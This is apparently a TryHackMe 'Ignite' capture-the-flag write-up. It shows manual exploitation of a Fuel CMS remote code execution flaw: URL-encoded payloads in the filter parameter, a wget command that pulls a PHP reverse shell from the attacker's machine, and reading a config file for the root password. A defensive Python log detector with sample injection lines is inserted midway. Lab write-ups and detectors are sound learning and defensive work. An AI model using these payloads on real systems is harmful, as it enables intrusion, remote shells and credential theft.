
TryHackMe – Ignite writeup without Metasploit

I know I always do Hack The Box writeups, and I felt I should cover both TryHackMe and Hack The Box. So here is my first TryHackMe writeup. It's called Ignite. It's an easy one: I did it in under an hour, it was fun and I learned something new. Nmap as usual.

The only open port was port 80, and it serves Fuel CMS. Don't forget to read through the whole page; it gives out a lot of information. Next is to exploit it. I will be doing a manual exploitation, so here it goes. Forgot to take a screenshot; was too lazy to go back.

First of all, request: http://10.10.40.254/fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('uname -a')%2b'

There is an RCE in Fuel CMS, and this is how we can check whether it is actually exploitable: `uname -a` will print out the information we need. After executing that command you need to check the page source, since the output is embedded in the response.

Now we know that it's exploitable. Let's get a reverse shell in fast. I took a PHP reverse shell, edited it, and then changed the exploit a bit: http://10.10.40.254/fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('wget http://10.11.14.81/reverse.php -O shell.php')%2b' WAIT!!!! Before firing the exploit, remember to set up the Python web server and also netcat, just to make sure you don't forget it.

Now navigate to the reverse shell (hope you have already set up netcat): http://10.10.40.254/shell.php
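From the defending side, both requests above stand out in the web server access log: the `filter` parameter of `/fuel/pages/select/` should never carry PHP function calls or variable-function invocations. The following detector is an added example, not code from the original post; the log lines are constructed in Apache combined format using the IPs from this writeup, and the `INJECTION_RE` pattern set is my own assumption about what to flag.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format), not taken from a real server.
SAMPLE_LOG = """\
10.11.14.81 - - [01/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select/?filter=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.14.81 - - [01/Jan/2024:10:00:05 +0000] "GET /fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('uname%20-a')%2b' HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.11.14.81 - - [01/Jan/2024:10:00:09 +0000] "GET /fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('wget%20http://10.11.14.81/reverse.php%20-O%20shell.php')%2b' HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.11.14.81 - - [01/Jan/2024:10:00:12 +0000] "GET /shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP constructs that have no business inside a page filter string (assumed pattern set):
# a function call such as pi( / print( / eval(, the word system, or a variable function $x(.
INJECTION_RE = re.compile(r"(\bpi\s*\(|\bprint\s*\(|\beval\s*\(|\bsystem\b|\$\w+\s*\()", re.I)


def decode_filter(path):
    """Return the fully URL-decoded 'filter' query value of a request path, or None."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)
    if "filter" not in qs:
        return None
    value = qs["filter"][0]
    # Decode a few more rounds so double-encoded payloads (%2524 -> %24 -> $) are normalised too.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious_requests(log_text):
    """Return (ip, timestamp, decoded_filter) for select-page requests whose filter looks like PHP code."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "/fuel/pages/select" not in m.group("path"):
            continue
        decoded = decode_filter(m.group("path"))
        if decoded and INJECTION_RE.search(decoded):
            hits.append((m.group("ip"), m.group("ts"), decoded))
    return hits
```

The decoded filter strings in the hits show the exact commands that were passed to `system`, which is what an incident responder wants to see first.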

We have a shell!!!!! Alright, next is privilege escalation. Remember in the beginning I told you to read the website; before that I did try different methods to get root but couldn't. So, as a last resort, go back to the page and navigate to the folder /var/www/html/fuel/application/config, and from there cat database.php.

Now we know the root password; let's try to log in with it.

I hope everyone enjoyed this box as much as I did. You can follow me on Twitter to get the latest updates: https://twitter.com/far3y
